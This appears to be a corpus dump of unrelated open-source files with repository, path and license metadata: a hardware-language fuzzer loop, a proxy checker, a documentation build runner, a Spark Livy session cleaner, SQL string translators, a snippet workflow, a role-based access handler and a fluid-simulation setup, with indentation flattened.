requests.put(uploadUrl, data=file, headers={ "content-type": "application/octet-stream" })
return uploadedFileUrl
else:
# Show service reported error
print(json["message"])
else:
print(f"Request error: {response.status_code} {response.reason}")
return None
if __name__ == '__main__':
main()
|
apache-2.0
| 6,094,854,437,032,515,000 | 32.828571 | 110 | 0.576135 | false |
google/xls
|
xls/fuzzer/run_fuzz.py
|
1
|
9053
|
# Lint as: python3
# Copyright 2020 The XLS Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Fuzzer generate-and-compare loop."""
import os
import shutil
import stat
import subprocess
import tempfile
import time
from typing import Tuple, Text, Optional
from absl import logging
import termcolor
from xls.common import runfiles
from xls.fuzzer import sample_runner
from xls.fuzzer import sample_summary_pb2
from xls.fuzzer.python import cpp_ast_generator as ast_generator
from xls.fuzzer.python import cpp_sample as sample
SAMPLE_RUNNER_MAIN_PATH = runfiles.get_path('xls/fuzzer/sample_runner_main')
IR_MINIMIZER_MAIN_PATH = runfiles.get_path('xls/tools/ir_minimizer_main')
SUMMARIZE_IR_MAIN_PATH = runfiles.get_path('xls/fuzzer/summarize_ir_main')
FIND_FAILING_INPUT_MAIN = runfiles.get_path(
'xls/fuzzer/find_failing_input_main')
def _write_to_file(dir_path: Text,
filename: Text,
content: Text,
executable: bool = False):
"""Writes the content into a file of the given name in the directory."""
path = os.path.join(dir_path, filename)
with open(path, 'w') as f:
f.write(content)
if executable:
st = os.stat(path)
os.chmod(path, st.st_mode | stat.S_IXUSR)
def _write_ir_summaries(run_dir: str,
timing: sample_summary_pb2.SampleTimingProto,
summary_path: str):
"""Appends IR summaries of IR files in the run dir to the summary file."""
args = []
unoptimized_path = os.path.join(run_dir, 'sample.ir')
if os.path.exists(unoptimized_path):
args.append('--unoptimized_ir=' + unoptimized_path)
optimized_path = os.path.join(run_dir, 'sample.opt.ir')
if os.path.exists(optimized_path):
args.append('--optimized_ir=' + optimized_path)
if not args:
return
subprocess.run(
[
SUMMARIZE_IR_MAIN_PATH,
'--logtostderr',
'--minloglevel=2',
'--summary_file=' + summary_path,
'--timing=' + str(timing),
] + args,
check=False)
def run_sample(smp: sample.Sample,
run_dir: Text,
summary_file: Optional[Text] = None,
generate_sample_ns: Optional[int] = None):
"""Runs the given sample in the given directory.
Args:
smp: Sample to run.
run_dir: Directory to run the sample in. The directory should exist and be
empty.
summary_file: The (optional) file to append sample summary.
generate_sample_ns: The (optional) time in nanoseconds to generate the
sample. Recorded in the summary file, if given.
Raises:
sample_runner.SampleError: on any non-zero status from the sample runner.
"""
start = time.time()
_write_to_file(run_dir, 'sample.x', smp.input_text)
_write_to_file(run_dir, 'options.json', smp.options.to_json())
if smp.args_batch:
_write_to_file(run_dir, 'args.txt',
sample.args_batch_to_text(smp.args_batch))
# Create a script named 'run.sh' for rerunning the sample.
args = [
SAMPLE_RUNNER_MAIN_PATH, '--logtostderr', '--input_file=sample.x',
'--options_file=options.json'
]
if smp.args_batch:
args.append('--args_file=args.txt')
args.append(run_dir)
_write_to_file(
run_dir,
'run.sh',
f'#!/bin/sh\n\n{subprocess.list2cmdline(args)}\n',
executable=True)
logging.vlog(1, 'Starting to run sample')
logging.vlog(2, smp.input_text)
runner = sample_runner.SampleRunner(run_dir)
runner.run_from_files('sample.x', 'options.json', 'args.txt')
timing = runner.timing
timing.total_ns = int((time.time() - start) * 1e9)
if generate_sample_ns:
# The sample generation time, if given, is not part of the measured total
# time, so add it in.
timing.total_ns += generate_sample_ns
timing.generate_sample_ns = generate_sample_ns
logging.vlog(1, 'Completed running sample, elapsed: %0.2fs',
time.time() - start)
if summary_file:
_write_ir_summaries(run_dir, timing, summary_file)
def minimize_ir(smp: sample.Sample,
run_dir: Text,
inject_jit_result: Optional[Text] = None) -> Optional[Text]:
"""Tries to minimize the IR of the given sample in the run directory.
Writes a test script into the run_directory for testing the IR for the
failure. Passes this test script to ir_minimizer_main to try to create a
minimal IR sample.
Args:
smp: The sample to try to minimize.
run_dir: The run directory the sample was run in.
inject_jit_result: For testing only. Value to produce as the JIT result.
Returns:
The path to the minimized IR file (created in the run directory), or None if
minimization was not possible
"""
if os.path.exists(os.path.join(run_dir, 'sample.ir')):
# First try to minimize using the sample runner binary as the minimization
# test.
ir_minimize_options = smp.options.replace(input_is_dslx=False)
_write_to_file(run_dir, 'ir_minimizer.options.json',
ir_minimize_options.to_json())
# Generate the sample runner script. The script should return 0 (success) if
# the sample fails so invert the return code of the invocation of
# sample_runner_main with '!'.
args = [
SAMPLE_RUNNER_MAIN_PATH, '--logtostderr',
'--options_file=ir_minimizer.options.json', '--args_file=args.txt',
'--input_file=$1'
]
_write_to_file(
run_dir,
'ir_minimizer_test.sh',
f'#!/bin/sh\n! {" ".join(args)}',
executable=True)
comp = subprocess.run([
IR_MINIMIZER_MAIN_PATH, '--logtostderr',
'--test_executable=ir_minimizer_test.sh', 'sample.ir'
],
cwd=run_dir,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=False)
if comp.returncode == 0:
minimized_ir_path = os.path.join(run_dir, 'minimized.ir')
with open(minimized_ir_path, 'wb') as f:
f.write(comp.stdout)
return minimized_ir_path
if smp.options.use_jit:
# Next try to minimize assuming the underlying cause was a JIT mismatch.
# The IR minimizer binary has special machinery for reducing these kinds
# of failures. The minimization occurs in two steps:
# (1) Find an input that results in a JIT vs interpreter mismatch (if any)
# (2) Run the minimization tool using this input as the test.
extra_args = ['--test_only_inject_jit_result=' +
inject_jit_result] if inject_jit_result else []
comp = subprocess.run(
[FIND_FAILING_INPUT_MAIN, '--input_file=args.txt', 'sample.ir'] +
extra_args,
cwd=run_dir,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=False)
if comp.returncode == 0:
# A failing input for JIT vs interpreter was found
failed_input = comp.stdout.decode('utf-8')
comp = subprocess.run(
[
IR_MINIMIZER_MAIN_PATH, '--logtostderr', '--test_llvm_jit',
'--use_optimization_pipeline', '--input=' + failed_input,
'sample.ir'
] + extra_args,
cwd=run_dir,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=False)
if comp.returncode == 0:
minimized_ir_path = os.path.join(run_dir, 'minimized.ir')
with open(minimized_ir_path, 'wb') as f:
f.write(comp.stdout)
return minimized_ir_path
return None
def run_fuzz(
rng: ast_generator.RngState,
ast_generator_options: ast_generator.AstGeneratorOptions,
calls_per_sample: int,
save_temps: bool,
sample_count: int,
codegen: bool,
simulate: bool = False,
return_samples: bool = False) -> Optional[Tuple[sample.Sample, ...]]:
"""Runs a fuzzing loop for "sample_count" samples."""
samples = []
for i in range(sample_count):
smp = ast_generator.generate_sample(
ast_generator_options, calls_per_sample,
sample.SampleOptions(
convert_to_ir=True,
optimize_ir=True,
codegen=codegen,
simulate=simulate), rng)
if return_samples:
samples.append(smp)
termcolor.cprint('=== Sample {}'.format(i), color='yellow')
print(smp.input_text)
sample_dir = tempfile.mkdtemp('run_fuzz_')
run_sample(smp, sample_dir)
if not save_temps:
shutil.rmtree(sample_dir)
if return_samples:
return tuple(samples)
|
apache-2.0
| 5,578,746,314,929,599,000 | 33.819231 | 80 | 0.637026 | false |
chenpengwuli/chris
|
check_proxy.py
|
1
|
1296
|
#coding=utf-8
import urllib2
import urllib
import time
import socket
ip_check_url = 'http://www.google.com.hk/'
user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0'
socket_timeout = 30
# Check proxy
def check_proxy(protocol, pip):
try:
proxy_handler = urllib2.ProxyHandler({protocol:pip})
opener = urllib2.build_opener(proxy_handler)
# opener.addheaders = [('User-agent', user_agent)] #这句加上以后无法正常检测,不知道是什么原因。
urllib2.install_opener(opener)
req = urllib2.Request(ip_check_url)
time_start = time.time()
conn = urllib2.urlopen(req)
# conn = urllib2.urlopen(ip_check_url)
time_end = time.time()
detected_pip = conn.read()
proxy_detected = True
except urllib2.HTTPError, e:
print "ERROR: Code ", e.code
return False
except Exception, detail:
print "ERROR: ", detail
return False
return proxy_detected
def main():
socket.setdefaulttimeout(socket_timeout)
print
protocol = "http"
current_proxy = "212.82.126.32:80"
proxy_detected = check_proxy(protocol, current_proxy)
if proxy_detected:
print (" WORKING: " + current_proxy)
else:
print " FAILED: %s " % ( current_proxy, )
if __name__ == '__main__':
main()
|
gpl-3.0
| -6,451,803,214,406,931,000 | 23.076923 | 87 | 0.662141 | false |
envoyproxy/envoy
|
tools/docs/sphinx_runner.py
|
1
|
7417
|
import argparse
import os
import platform
import re
import sys
import tarfile
import tempfile
from functools import cached_property
import yaml
from colorama import Fore, Style
from sphinx.cmd.build import main as sphinx_build
from tools.base import runner
class SphinxBuildError(Exception):
pass
class SphinxEnvError(Exception):
pass
class SphinxRunner(runner.Runner):
_build_dir = "."
_build_sha = "UNKNOWN"
@property
def blob_sha(self) -> str:
"""Returns either the version tag or the current build sha"""
return self.docs_tag or self.build_sha
@property
def build_dir(self) -> str:
"""Returns current build_dir - most likely a temp directory"""
return self._build_dir
@property
def build_sha(self) -> str:
"""Returns either a provided build_sha or a default"""
return self.args.build_sha or self._build_sha
@cached_property
def colors(self) -> dict:
"""Color scheme for build summary"""
return dict(chrome=Fore.LIGHTYELLOW_EX, key=Fore.LIGHTCYAN_EX, value=Fore.LIGHTMAGENTA_EX)
@cached_property
def config_file(self) -> str:
"""Populates a config file with self.configs and returns the file path"""
with open(self.config_file_path, "w") as f:
f.write(yaml.dump(self.configs))
return self.config_file_path
@property
def config_file_path(self) -> str:
"""Path to a (temporary) build config"""
return os.path.join(self.build_dir, "build.yaml")
@cached_property
def configs(self) -> str:
"""Build configs derived from provided args"""
_configs = dict(
version_string=self.version_string,
release_level=self.release_level,
blob_sha=self.blob_sha,
version_number=self.version_number,
docker_image_tag_name=self.docker_image_tag_name)
if self.validator_path:
_configs["validator_path"] = self.validator_path
if self.descriptor_path:
_configs["descriptor_path"] = self.descriptor_path
return _configs
@property
def descriptor_path(self) -> str:
"""Path to a descriptor file for config validation"""
return os.path.abspath(self.args.descriptor_path)
@property
def docker_image_tag_name(self) -> str:
"""Tag name of current docker image"""
return re.sub(r"([0-9]+\.[0-9]+)\.[0-9]+.*", r"v\1-latest", self.version_number)
@property
def docs_tag(self) -> str:
"""Tag name - ie named version for this docs build"""
return self.args.docs_tag
@cached_property
def html_dir(self) -> str:
"""Path to (temporary) directory for outputting html"""
return os.path.join(self.build_dir, "generated/html")
@property
def output_filename(self) -> str:
"""Path to tar file for saving generated html docs"""
return self.args.output_filename
@property
def py_compatible(self) -> bool:
"""Current python version is compatible"""
return bool(sys.version_info.major == 3 and sys.version_info.minor >= 8)
@property
def release_level(self) -> str:
"""Current python version is compatible"""
return "tagged" if self.docs_tag else "pre-release"
@cached_property
def rst_dir(self) -> str:
"""Populates an rst directory with contents of given rst tar,
and returns the path to the directory
"""
rst_dir = os.path.join(self.build_dir, "generated/rst")
if self.rst_tar:
with tarfile.open(self.rst_tar) as tarfiles:
tarfiles.extractall(path=rst_dir)
return rst_dir
@property
def rst_tar(self) -> str:
"""Path to the rst tarball"""
return self.args.rst_tar
@property
def sphinx_args(self) -> list:
"""Command args for sphinx"""
return ["-W", "--keep-going", "--color", "-b", "html", self.rst_dir, self.html_dir]
@property
def validator_path(self) -> str:
"""Path to validator utility for validating snippets"""
return os.path.abspath(self.args.validator_path)
@property
def version_file(self) -> str:
"""Path to version files for deriving docs version"""
return self.args.version_file
@cached_property
def version_number(self) -> str:
"""Semantic version"""
with open(self.version_file) as f:
return f.read().strip()
@property
def version_string(self) -> str:
"""Version string derived from either docs_tag or build_sha"""
return (
f"tag-{self.docs_tag}"
if self.docs_tag else f"{self.version_number}-{self.build_sha[:6]}")
def add_arguments(self, parser: argparse.ArgumentParser) -> None:
parser.add_argument("--build_sha")
parser.add_argument("--docs_tag")
parser.add_argument("--version_file")
parser.add_argument("--validator_path")
parser.add_argument("--descriptor_path")
parser.add_argument("rst_tar")
parser.add_argument("output_filename")
def build_html(self) -> None:
if sphinx_build(self.sphinx_args):
raise SphinxBuildError("BUILD FAILED")
def build_summary(self) -> None:
print()
print(self._color("#### Sphinx build configs #####################"))
print(self._color("###"))
for k, v in self.configs.items():
print(f"{self._color('###')} {self._color(k, 'key')}: {self._color(v, 'value')}")
print(self._color("###"))
print(self._color("###############################################"))
print()
def check_env(self) -> None:
if not self.py_compatible:
raise SphinxEnvError(
f"ERROR: python version must be >= 3.8, you have {platform.python_version()}")
if not self.configs["release_level"] == "tagged":
return
if f"v{self.version_number}" != self.docs_tag:
raise SphinxEnvError(
"Given git tag does not match the VERSION file content:"
f"{self.docs_tag} vs v{self.version_number}")
with open(os.path.join(self.rst_dir, "version_history/current.rst")) as f:
if not self.version_number in f.read():
raise SphinxEnvError(
f"Git tag ({self.version_number}) not found in version_history/current.rst")
def create_tarball(self) -> None:
with tarfile.open(self.output_filename, "w") as tar:
tar.add(self.html_dir, arcname=".")
def run(self) -> int:
with tempfile.TemporaryDirectory() as build_dir:
return self._run(build_dir)
def _color(self, msg, name=None):
return f"{self.colors[name or 'chrome']}{msg}{Style.RESET_ALL}"
def _run(self, build_dir):
self._build_dir = build_dir
os.environ["ENVOY_DOCS_BUILD_CONFIG"] = self.config_file
try:
self.check_env()
except SphinxEnvError as e:
print(e)
return 1
self.build_summary()
try:
self.build_html()
except SphinxBuildError as e:
print(e)
return 1
self.create_tarball()
def main(*args) -> int:
return SphinxRunner(*args).run()
if __name__ == "__main__":
sys.exit(main(*sys.argv[1:]))
|
apache-2.0
| 2,763,211,751,225,945,000 | 31.530702 | 98 | 0.593771 | false |
hongchhe/myhadoop
|
spark/scripts/cleansessions.py
|
1
|
1346
|
import requests
def cleanUnUsedLivySessions(sparkHost = 'http://spark-master0:8998', \
sessionState=['idle', 'error', 'shutting_down', 'dead', 'success'], pyFiles = []):
'''
'''
host = sparkHost
sessionData = {
'kind': 'pyspark',
'pyFiles': pyFiles
}
headers = {'Content-Type': 'application/json'}
rootSessionsUrl = host + '/sessions'
curSessionsReqJson = requests.get(rootSessionsUrl, headers=headers).json()
# If there are many sessions, clean the sessions whose state is in the "sessionState" list.
# As for the last one, delete it if this session state is in the ['error', 'dead', 'success'] list
if (curSessionsReqJson['total'] > 0):
for sessionItem in curSessionsReqJson['sessions'][:-1]:
if (sessionItem['state'] in sessionState) :
sessionUrl = "{0}/{1}".format(rootSessionsUrl, sessionItem['id'])
requests.delete(sessionUrl)
# handle the last one session specially
lastOneStatesLt = ['error', 'dead', 'success']
if curSessionsReqJson['sessions'][-1]['state'] in lastOneStatesLt:
sessionUrl = "{0}/{1}".format(rootSessionsUrl, curSessionsReqJson['sessions'][-1]['id'])
requests.delete(sessionUrl)
else:
pass
cleanUnUsedLivySessions()
|
apache-2.0
| 7,989,615,120,050,437,000 | 39.787879 | 102 | 0.618128 | false |
ibis-project/ibis
|
ibis/backends/base/sql/registry/string.py
|
1
|
2959
|
import ibis.expr.operations as ops
from . import helpers
def substring(translator, expr):
op = expr.op()
arg, start, length = op.args
arg_formatted = translator.translate(arg)
start_formatted = translator.translate(start)
# Impala is 1-indexed
if length is None or isinstance(length.op(), ops.Literal):
lvalue = length.op().value if length is not None else None
if lvalue:
return 'substr({}, {} + 1, {})'.format(
arg_formatted, start_formatted, lvalue
)
else:
return 'substr({}, {} + 1)'.format(arg_formatted, start_formatted)
else:
length_formatted = translator.translate(length)
return 'substr({}, {} + 1, {})'.format(
arg_formatted, start_formatted, length_formatted
)
def string_find(translator, expr):
op = expr.op()
arg, substr, start, _ = op.args
arg_formatted = translator.translate(arg)
substr_formatted = translator.translate(substr)
if start is not None and not isinstance(start.op(), ops.Literal):
start_fmt = translator.translate(start)
return 'locate({}, {}, {} + 1) - 1'.format(
substr_formatted, arg_formatted, start_fmt
)
elif start is not None and start.op().value:
sval = start.op().value
return 'locate({}, {}, {}) - 1'.format(
substr_formatted, arg_formatted, sval + 1
)
else:
return 'locate({}, {}) - 1'.format(substr_formatted, arg_formatted)
def find_in_set(translator, expr):
op = expr.op()
arg, str_list = op.args
arg_formatted = translator.translate(arg)
str_formatted = ','.join([x._arg.value for x in str_list])
return "find_in_set({}, '{}') - 1".format(arg_formatted, str_formatted)
def string_join(translator, expr):
op = expr.op()
arg, strings = op.args
return helpers.format_call(translator, 'concat_ws', arg, *strings)
def string_like(translator, expr):
arg, pattern, _ = expr.op().args
return '{} LIKE {}'.format(
translator.translate(arg), translator.translate(pattern)
)
def parse_url(translator, expr):
op = expr.op()
arg, extract, key = op.args
arg_formatted = translator.translate(arg)
if key is None:
return "parse_url({}, '{}')".format(arg_formatted, extract)
else:
key_fmt = translator.translate(key)
return "parse_url({}, '{}', {})".format(
arg_formatted, extract, key_fmt
)
def startswith(translator, expr):
arg, start = expr.op().args
arg_formatted = translator.translate(arg)
start_formatted = translator.translate(start)
return f"{arg_formatted} like concat({start_formatted}, '%')"
def endswith(translator, expr):
arg, start = expr.op().args
arg_formatted = translator.translate(arg)
end_formatted = translator.translate(start)
return f"{arg_formatted} like concat('%', {end_formatted})"
|
apache-2.0
| -8,646,182,163,526,600,000 | 28.59 | 78 | 0.612031 | false |
yubowenok/vastcha15
|
proc/gc_proc_meta.py
|
1
|
2449
|
# must run after mc1_proc_meta.py
import time, sys
from dateutil.parser import parse
files = [
"MC2/comm-data-Fri.csv",
"MC2/comm-data-Sat.csv",
"MC2/comm-data-Sun.csv",
]
locationCounter, idCounter = 0, 0
ids, locations, events = {}, {}, {}
# get meta data
file_meta = open("MC1.meta", 'r')
num_people = int(file_meta.readline())
for i in range(num_people):
tokens = file_meta.readline().rstrip('\n').split(' ')
index, id = int(tokens[0]), int(tokens[1])
ids[id] = index
num_events = int(file_meta.readline())
for i in range(num_events):
tokens = file_meta.readline().rstrip('\n').split(' ')
index, event = int(tokens[0]), tokens[1]
events[event] = index
file_meta.close()
idCounter = len(ids)
cnt = 0
for file_name in files:
file = open(file_name)
first_line = True
for line in file:
if first_line:
first_line = False # skip first line
continue
tokens = line.split(',')
id1, id2, location = int(tokens[1]), tokens[2], tokens[3].rstrip('\n')
if id2 == "external":
id2 = 9999999 # not used in data
else:
id2 = int(id2)
if location not in locations:
locations[location] = locationCounter
locationCounter += 1
if id1 not in ids:
ids[id1] = idCounter
idCounter += 1
if id2 not in ids:
ids[id2] = idCounter
idCounter += 1
cnt += 1
if cnt % 100000 == 0:
print >> sys.stderr, cnt
print >> sys.stderr, file_name + " complete"
# ids
ids_sorted = []
for key, value in ids.iteritems():
ids_sorted.append([key, value])
# events
events_sorted = []
for key, value in events.iteritems():
events_sorted.append([key, value])
# locations
locations_sorted = []
for key, value in locations.iteritems():
locations_sorted.append([key, value])
# sorting
ids_sorted.sort(key = lambda x: x[1])
events_sorted.sort(key = lambda x: x[1])
locations_sorted.sort(key = lambda x: x[1])
# write meta data to a text file
file_meta = open("GC.meta", 'w')
n = len(ids_sorted) # number of people
file_meta.write("%d\n" % n)
for row in ids_sorted:
file_meta.write("%d %d\n" % (row[1], row[0]))
n = len(events_sorted) # number of events
file_meta.write("%d\n" % n)
for row in events_sorted:
file_meta.write("%d %s\n" % (row[1], row[0]))
n = len(locations_sorted) # number of locations
file_meta.write("%d\n" % n)
for row in locations_sorted:
file_meta.write("%d %s\n" % (row[1], row[0]))
file_meta.close()
|
mit
| 7,298,783,781,361,091,000 | 24.510417 | 74 | 0.627195 | false |
ejsuncy/alfred-angular-snippets
|
script.py
|
1
|
3869
|
#!/usr/bin/python
# encoding: utf-8
import sys
import re
from workflow import Workflow3
import json
__github_slug__ = 'ejsuncy/alfred-angular-snippets'
log = None
var_regex = re.compile("\${(.*?):(.*?)}")
cursor_regex = re.compile("\$0")
def main(wf):
# Process magic args
sys_args = wf.args
query = sys.argv[1].split()
keyword = query[0]
if (keyword):
results = wf.filter(keyword, snippets.keys())
for result in results:
snippet_name = result
snippet_description = snippets[result]['description']
snippet_body = "\n".join(snippets[result]['body'])
subtitle = snippet_description
valid = True
autocomplete = result
# if len(query) > 1:
# subtitle += ": add %s" % snippet_name
# valid = True
# autocomplete = None
item = wf.add_item(title=snippet_name,
subtitle=subtitle,
valid=valid,
arg="potato",
autocomplete=autocomplete)
# var_names = []
# name = query[1] # after snippet keyword, the next arg is always the name
# Name = [name[0].upper() if len(name) == 1 else name[0].upper() + name[1:]][0]
match_iter = var_regex.finditer(snippet_body) # finds all the variables of pattern ${1:varname}
# if len(query) > 1:
for match in match_iter:
var_name = match.group(2)
var_string = re.escape(match.group(0))
snippet_body = re.sub(var_string, "%s" % var_name, snippet_body) # replace ${1:varname} with varname (VS Code -> alfred)
# if "name" == var_string:
# var_name_value = name
# elif "Name" == var_string:
# var_name_value = Name
# elif "ServiceName" == var_string:
# var_name_value = Name
# elif "eventName" == var_string:
# var_name_value = name
# if var_name == "selector-name":
# var_name = "selectorName"
# item.setvar(var_name, 'selector-' + str(query[var_index]).lower())
# elif var_name == "Name":
# uppercased = query[var_index][0].upper()
# if len(query[var_index]) > 1:
# uppercased += query[var_index][1:]
# item.setvar(var_name, uppercased)
# else:
# var_name = var_name.replace("-", "")
# item.setvar(var_name, query[var_index])
# var_names.append(var_name)
snippet_body = re.sub(cursor_regex, "{cursor}", snippet_body)
item.setvar('snippetBody', snippet_body)
# item.setvar('varNames', " ".join(var_names))
wf.send_feedback()
def get_snippets():
snippets = {}
with open("snippets/typescript.json") as f:
json_str = f.read()
snippets.update(json.loads(json_str))
with open("snippets/html.json") as f:
json_str = f.read()
snippets.update(json.loads(json_str))
return snippets
if __name__ == '__main__':
update_settings = {
'github_slug': __github_slug__
}
wf = Workflow3(libraries=['./lib'], update_settings = update_settings)
if wf.update_available:
wf.add_item('New version available',
'Action this item to install the update',
autocomplete='workflow:update',
icon=ICON_INFO)
global snippets
snippets = wf.cached_data('snippets', get_snippets, max_age=0)
# Assign Workflow logger to a global variable for convenience
log = wf.logger
sys.exit(wf.run(main))
|
mit
| 9,202,923,877,124,489,000 | 30.201613 | 136 | 0.514345 | false |
hulingfeng211/weixin
|
handler/rbac.py
|
1
|
3569
|
# -*- coding:utf-8 -*-
#负责角色、权限的相关管理界面的处理
import json
import logging
from bson.objectid import ObjectId
from tornado.gen import coroutine
from tornado.web import RequestHandler, HTTPError
from core import bson_encode, is_json_request, generate_response, clone_dict_without_id
from core.utils import make_password
from handler import CRUDHandler
__author__ = 'george'
class UserHandler(RequestHandler):
@coroutine
def get(self, *args, **kwargs):
user_id=args[0] if len(args)>0 else None
db=self.settings['db']
if user_id:
user =yield db.user.find_one({"_id":ObjectId(user_id)})
self.write(bson_encode(user))
else:
users=yield db.user.find({}).to_list(length=None)
self.write(bson_encode(users))
@coroutine
def delete(self, *args, **kwargs):
id = args[0] if len(args) > 0 else None
if id:
db = self.settings['db']
yield db.user.remove({"_id": ObjectId(id)})
@coroutine
def post(self, *args, **kwargs):
if is_json_request(self.request):
body=json.loads(self.request.body)
else:
raise HTTPError(status_code=500,log_message="仅支持Content-type:application/json")
db=self.settings['db']
if body.get('_id',None):#update
user_dict=clone_dict_without_id(body)
user_dict.pop('password')
yield db.user.update({"_id":ObjectId(body.get('_id'))},{
"$set":user_dict
})
else:
body['password']=make_password(body.get('password','111111'))
yield db.user.insert(body)
self.write(generate_response(message="保存成功"))
class MenuHandler(RequestHandler):
def get(self, *args, **kwargs):
db=self.settings['dbsync']
def get_node_child(node):
if not node:
return
child_list=db.menu.find({"parent_uid":node.get('uid')})
node['children']=[]
node['children']=[get_node_child(item) for item in child_list]
return node
if args[0] if len(args)>0 else None and args[0]=='all_leaf':#取所有的叶子节点
leaf_node=list(db.menu.find({"is_leaf":True}))
self.write(bson_encode(leaf_node))
else:
root_node= db.menu.find({"parent_uid":{"$exists":False}})
result=[get_node_child(itm) for itm in root_node]
self.write(bson_encode(result))
def post(self, *args, **kwargs):
if is_json_request(self.request):
body=json.loads(self.request.body)
else:
raise HTTPError(status_code=500,log_message="仅支持Content-type:application/json")
db=self.settings['dbsync']
db.menu.remove({})
def save_node(item):
for innerItem in item.get('children',[]):
save_node(innerItem)
item['selected']=False
item['is_leaf']=len(item['children'])==0
item.pop('children')
db.menu.insert(item)
#body is array
for item in body:
save_node(item)
route=[
(r'/rbac/user',UserHandler),
(r'/rbac/user/(.*)',UserHandler),
(r'/rbac/menu',MenuHandler),
(r'/rbac/menu/(.*)',MenuHandler),
(r'/rbac/role',CRUDHandler,{'cname':'role'}),
(r'/rbac/role/(.*)',CRUDHandler,{'cname':'role'}),
(r'/rbac/permission',CRUDHandler,{'cname':'permission'}),
(r'/rbac/permission/(.*)',CRUDHandler,{'cname':'permission'})
]
|
apache-2.0
| -4,920,719,644,731,826,000 | 33.99 | 91 | 0.578165 | false |
erdc/proteus
|
proteus/tests/ProjScheme_with_EV/NS_convergence.py
|
1
|
8019
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from past.utils import old_div
from math import *
import proteus.MeshTools
from proteus import Domain
from proteus.default_n import *
from proteus.Profiling import logEvent
from .parameters import *
manufactured_solution = 2 #1: u.n!=0, 2: u.n=0
# ----- PARAMETERS ABOUT STABILIZATION OF NS ----- #
# see parameters.py
# ----- OTHER IMPORTANT PARAMETERS FOR CONVERGENCE TEST ----- #
KILL_PRESSURE_TERM = False #True just for debigging
Refinement = 0
mu = 1.0
ns_forceStrongDirichlet = False
# ----- ENTROPY VISCOSITY PARAMETERS ----- #
cE = 1.0
cMax = 1.0
# ----- numerical options to RANS3PF ----- #
fixNullSpace_PresInc = True
INTEGRATE_BY_PARTS_DIV_U_PresInc = True
CORRECT_VELOCITY = True
# ----- Discretization -- input options ----- #
genMesh = True
movingDomain = False
useOldPETSc = False
useSuperlu = True
timeDiscretization = 'vbdf' # 'vbdf', 'be', 'flcbdf'
spaceOrder = 2
pspaceOrder = 1
useHex = False
useMetrics = 0.0
useVF = 0.0
useRBLES=0.0
# Input checks
if spaceOrder not in [1, 2]:
print("INVALID: spaceOrder" + spaceOrder)
sys.exit()
if useMetrics not in [0.0, 1.0]:
print("INVALID: useMetrics")
sys.exit()
# Discretization
nd = 2
if spaceOrder == 1:
hFactor = 1.0
if useHex:
basis = C0_AffineLinearOnCubeWithNodalBasis
elementQuadrature = CubeGaussQuadrature(nd, 2)
elementBoundaryQuadrature = CubeGaussQuadrature(nd - 1, 2)
else:
basis = C0_AffineLinearOnSimplexWithNodalBasis
elementQuadrature = SimplexGaussQuadrature(nd, 3)
elementBoundaryQuadrature = SimplexGaussQuadrature(nd - 1, 3)
elif spaceOrder == 2:
hFactor = 0.5
if useHex:
basis = C0_AffineLagrangeOnCubeWithNodalBasis
elementQuadrature = CubeGaussQuadrature(nd, 4)
elementBoundaryQuadrature = CubeGaussQuadrature(nd - 1, 4)
else:
basis = C0_AffineQuadraticOnSimplexWithNodalBasis
elementQuadrature = SimplexGaussQuadrature(nd, 5)
elementBoundaryQuadrature = SimplexGaussQuadrature(nd - 1, 5)
if pspaceOrder == 1:
if useHex:
pbasis = C0_AffineLinearOnCubeWithNodalBasis
else:
pbasis = C0_AffineLinearOnSimplexWithNodalBasis
elif pspaceOrder == 2:
if useHex:
pbasis = C0_AffineLagrangeOnCubeWithNodalBasis
else:
pbasis = C0_AffineQuadraticOnSimplexWithNodalBasis
# Domain and mesh
L = (1.0, 1.0)
he = old_div(L[0],float(4*Refinement-1))
he*=0.5
he*=0.5
weak_bc_penalty_constant = 1E6
nLevels = 1
#parallelPartitioningType = proteus.MeshTools.MeshParallelPartitioningTypes.element
parallelPartitioningType = proteus.MeshTools.MeshParallelPartitioningTypes.node
nLayersOfOverlapForParallel = 0
structured = False
if useHex:
nnx = 4 * Refinement + 1
nny = 2 * Refinement + 1
hex = True
domain = Domain.RectangularDomain(L)
else:
boundaries = ['left', 'right', 'bottom', 'top', 'front', 'back']
boundaryTags = dict([(key, i + 1) for (i, key) in enumerate(boundaries)])
if structured:
nnx = 4 * Refinement
nny = 4 * Refinement
else:
vertices = [[0.0, 0.0], #0
[L[0], 0.0], #1
[L[0], L[1]], #2
[0.0, L[1]]] #3
vertexFlags = [boundaryTags['bottom'],
boundaryTags['bottom'],
boundaryTags['top'],
boundaryTags['top']]
segments = [[0, 1],
[1, 2],
[2, 3],
[3, 0]]
segmentFlags = [boundaryTags['bottom'],
boundaryTags['right'],
boundaryTags['top'],
boundaryTags['left']]
regions = [[1.2, 0.6]]
regionFlags = [1]
domain = Domain.PlanarStraightLineGraphDomain(vertices=vertices,
vertexFlags=vertexFlags,
segments=segments,
segmentFlags=segmentFlags,
regions=regions,
regionFlags=regionFlags)
#go ahead and add a boundary tags member
domain.boundaryTags = boundaryTags
domain.writePoly("mesh")
domain.writePLY("mesh")
domain.writeAsymptote("mesh")
triangleOptions = "VApq30Dena%8.8f" % (old_div((he ** 2), 2.0),)
domain.MeshOptions.nn = nn
domain.MeshOptions.nnx = nnx
domain.MeshOptions.nny = nny
domain.MeshOptions.nnz = nnz
domain.MeshOptions.triangleFlag=0
domain.MeshOptions.triangleOptions=triangleOptions
# Time stepping
T=1.0
dt_fixed = 0.1
dt_init = min(0.1*dt_fixed,0.001)
runCFL=0.33
nDTout = int(round(old_div(T,dt_fixed)))
# Numerical parameters
ns_sed_forceStrongDirichlet = False
if useMetrics:
ns_shockCapturingFactor = 0.5
ns_lag_shockCapturing = True
ns_lag_subgridError = True
ls_shockCapturingFactor = 0.5
ls_lag_shockCapturing = True
ls_sc_uref = 1.0
ls_sc_beta = 1.0
